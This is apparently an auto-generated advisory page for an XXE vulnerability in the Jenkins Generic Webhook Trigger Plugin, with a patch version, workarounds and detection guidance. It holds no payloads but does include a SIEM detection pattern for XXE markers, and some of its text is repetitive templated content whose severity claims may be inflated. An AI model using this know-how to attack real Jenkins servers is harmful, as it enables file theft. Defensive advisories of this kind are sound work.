CVE-2021-21669 – This vulnerability in Jenkins Generic Webhook T... (How to Fix)

Q: What is the severity of CVE-2021-21669?

CVE-2021-21669 has a CVSS score of 9.8 (CRITICAL). This vulnerability in Jenkins Generic Webhook Trigger Plugin allows attackers to perform XML External Entity (XXE) attacks by sending specially crafted XML payloads. It affects Jenkins instances with the vulnerable plugin installed, potentially allowing attackers to read arbitrary files on the Jenkins controller file system. The vulnerability is particularly dangerous because it can be exploited via webhook endpoints that accept XML data.

📋 TL;DR

This vulnerability in Jenkins Generic Webhook Trigger Plugin allows attackers to perform XML External Entity (XXE) attacks by sending specially crafted XML payloads. It affects Jenkins instances with the vulnerable plugin installed, potentially allowing attackers to read arbitrary files on the Jenkins controller file system. The vulnerability is particularly dangerous because it can be exploited via webhook endpoints that accept XML data.

💻 Affected Systems

Products:

Jenkins Generic Webhook Trigger Plugin

Versions: 1.72 and earlier

Operating Systems: All platforms running Jenkins

Default Config Vulnerable: ⚠️ Yes

Notes: Only affects Jenkins instances with the Generic Webhook Trigger Plugin installed and configured to accept XML payloads.

📦 What is this software?

Generic Webhook Trigger by Jenkins

View all CVEs affecting Generic Webhook Trigger →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Remote code execution, complete system compromise, and data exfiltration from the Jenkins controller server.

🟠

Likely Case

Arbitrary file read from the Jenkins controller file system, potentially exposing sensitive configuration files, credentials, and source code.

🟢

If Mitigated

Limited impact with proper network segmentation and file system permissions, though XXE could still expose some sensitive data.

🌐 Internet-Facing: HIGH - Webhook endpoints are typically exposed to external systems and can be triggered by unauthenticated requests.

🏢 Internal Only: MEDIUM - Internal attackers could still exploit this, but requires access to trigger webhooks.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploitation requires sending XML payloads to webhook endpoints, which are often accessible without authentication. The vulnerability is well-documented in security advisories.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.73 and later

Vendor Advisory: https://www.jenkins.io/security/advisory/2021-06-18/#SECURITY-2330

Restart Required: Yes

Instructions:

1. Update Jenkins Generic Webhook Trigger Plugin to version 1.73 or later via Jenkins Plugin Manager. 2. Restart Jenkins to apply the update. 3. Verify the plugin version in Jenkins plugin management interface.

🔧 Temporary Workarounds

Disable XML parsing in webhook configuration

all

Configure Generic Webhook Trigger to only accept JSON payloads instead of XML

Navigate to Jenkins > Manage Jenkins > Configure System > Generic Webhook Trigger section
Set 'Content Type' to 'application/json' for all webhook configurations

Restrict webhook access

all

Use network controls to limit which IP addresses can access webhook endpoints

Configure firewall rules to restrict access to Jenkins webhook endpoints
Use Jenkins security matrix to restrict webhook trigger permissions

🧯 If You Can't Patch

Disable or uninstall the Generic Webhook Trigger Plugin entirely
Implement strict network segmentation to isolate Jenkins from untrusted networks

🔍 How to Verify

Check if Vulnerable:

Check Jenkins plugin manager for Generic Webhook Trigger Plugin version. If version is 1.72 or earlier, the system is vulnerable.

Check Version:

Navigate to Jenkins > Manage Jenkins > Manage Plugins > Installed tab, search for 'Generic Webhook Trigger'

Verify Fix Applied:

Verify plugin version is 1.73 or later in Jenkins plugin management interface.

📡 Detection & Monitoring

Log Indicators:

Unusual XML parsing errors in Jenkins logs
Multiple failed webhook attempts with XML payloads
File read attempts via XXE payloads in access logs

Network Indicators:

XML payloads containing external entity declarations sent to Jenkins webhook endpoints
Outbound connections from Jenkins to external servers initiated by XXE payloads

SIEM Query:

source="jenkins.log" AND ("XXE" OR "External Entity" OR "DOCTYPE" OR "SYSTEM")

📊 Metadata

CVE ID: CVE-2021-21669

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Published: June 18, 2021

Last Updated: November 21, 2024

🔗 References

http://www.openwall.com/lists/oss-security/2021/06/18/1 Mailing List,Third Party Advisory
https://www.jenkins.io/security/advisory/2021-06-18/#SECURITY-2330 Vendor Advisory
http://www.openwall.com/lists/oss-security/2021/06/18/1 Mailing List,Third Party Advisory
https://www.jenkins.io/security/advisory/2021-06-18/#SECURITY-2330 Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON